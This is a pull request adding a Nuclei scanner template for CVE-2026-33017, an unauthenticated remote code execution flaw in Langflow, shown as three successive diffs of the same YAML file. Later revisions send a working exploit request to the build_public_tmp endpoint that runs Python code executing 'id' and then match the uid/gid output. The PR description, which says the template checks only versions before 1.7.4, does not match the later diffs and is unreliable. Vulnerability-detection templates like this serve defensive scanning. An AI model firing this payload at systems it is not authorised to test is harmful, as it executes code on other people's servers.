### PR TITLE
Added Nuclei Template for CVE-2026-33017 (Langflow RCE)

### DIFF
--- a/http/cves/2026/CVE-2026-33017.yaml
+++ b/http/cves/2026/CVE-2026-33017.yaml
@@ -1,41 +1,31 @@
 id: CVE-2026-33017
 
 info:
-  name: Langflow - Remote Code Execution
+  name: Langflow < 1.9.0 - Remote Code Execution
   author: himind
   severity: critical
   description: |
-    Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE)
-    via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing
-    Python code that is executed during the build process without proper sandboxing.
+    Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.
   reference:
     - https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html
     - https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-33017
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2026-33017
     cwe-id: CWE-94
   metadata:
+    verified: true
     max-request: 2
     vendor: langflow
     product: langflow
-    shodan-query: http.title:"Langflow"
-    verified: true
-  tags: cve,cve2026,langflow,rce,ai,unauth
+    shodan-query: http.favicon.hash:1727196746
+  tags: cve,cve2026,langflow,rce,ai,passive
+
+flow: http(1) || http(2)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/v1/version"
-
-    extractors:
-      - type: json
-        json:
-          - ".version"
-        internal: true
-        name: version
-
   - method: POST
     path:
       - "{{BaseURL}}/api/v1/build_public_tmp/00000000-0000-0000-0000-000000000000/flow"
@@ -60,17 +50,28 @@ http:
     headers:
       Content-Type: application/json
 
-    matchers-condition: or
     matchers:
-      - type: word
-        words:
-          - "uid="
-          - "gid="
-          - "groups="
-        part: body
+      - type: dsl
+        dsl:
+          - 'contains(content_type, "application/json")'
+          - 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
+          - 'contains(body, "xmsg\":")'
+        condition: and
 
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/version"
+
+    matchers:
       - type: dsl
         dsl:
           - "compare_versions(version, '< 1.9.0')"
           - "status_code == 200"
         condition: and
+
+    extractors:
+      - type: json
+        name: version
+        json:
+          - ".version"
+        internal: true

--- a/http/cves/2026/CVE-2026-33017.yaml
+++ b/http/cves/2026/CVE-2026-33017.yaml
@@ -1,0 +1,38 @@
+id: CVE-2026-33017
+
+info:
+  name: Langflow Unauthenticated RCE
+  author: himind
+  severity: critical
+  description: |
+    Langflow versions before 1.7.4 are vulnerable to unauthenticated remote code execution (RCE)
+    via the build endpoint. Attackers can submit a manipulated flow JSON containing
+    Python code that is executed using the exec() function without proper sandboxing.
+  reference:
+    - https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html
+    - https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-33017
+  tags: cve,cve2026,langflow,rce,ai
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/version"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "version"
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - "compare_versions(version, '< 1.7.4')"

--- a/http/cves/2026/CVE-2026-33017.yaml
+++ b/http/cves/2026/CVE-2026-33017.yaml
@@ -1,38 +1,76 @@
 id: CVE-2026-33017
 
 info:
-  name: Langflow Unauthenticated RCE
+  name: Langflow - Remote Code Execution
   author: himind
   severity: critical
   description: |
-    Langflow versions before 1.7.4 are vulnerable to unauthenticated remote code execution (RCE)
-    via the build endpoint. Attackers can submit a manipulated flow JSON containing
-    Python code that is executed using the exec() function without proper sandboxing.
+    Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE)
+    via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing
+    Python code that is executed during the build process without proper sandboxing.
   reference:
     - https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html
     - https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 9.8
     cve-id: CVE-2026-33017
-  tags: cve,cve2026,langflow,rce,ai
+    cwe-id: CWE-94
+  metadata:
+    max-request: 2
+    vendor: langflow
+    product: langflow
+    shodan-query: http.title:"Langflow"
+    verified: true
+  tags: cve,cve2026,langflow,rce,ai,unauth
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/api/v1/version"
 
-    matchers-condition: and
+    extractors:
+      - type: json
+        json:
+          - ".version"
+        internal: true
+        name: version
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/v1/build_public_tmp/00000000-0000-0000-0000-000000000000/flow"
+    body: |
+      {
+        "data": {
+          "nodes": [
+            {
+              "data": {
+                "node": {
+                  "template": {
+                    "code": {
+                      "value": "def function():\n    import os\n    return os.popen('id').read()"
+                    }
+                  }
+                }
+              }
+            }
+          ]
+        }
+      }
+    headers:
+      Content-Type: application/json
+
+    matchers-condition: or
     matchers:
       - type: word
         words:
-          - "version"
+          - "uid="
+          - "gid="
+          - "groups="
         part: body
-
-      - type: status
-        status:
-          - 200
 
       - type: dsl
         dsl:
-          - "compare_versions(version, '< 1.7.4')"
+          - "compare_versions(version, '< 1.9.0')"
+          - "status_code == 200"
+        condition: and


### PR DESCRIPTION
This PR adds a detection template for the critical unauthenticated RCE in Langflow (CVE-2026-33017) affecting versions before 1.7.4. The template checks the version via the /api/v1/version endpoint. /claim #CVE-2026-33017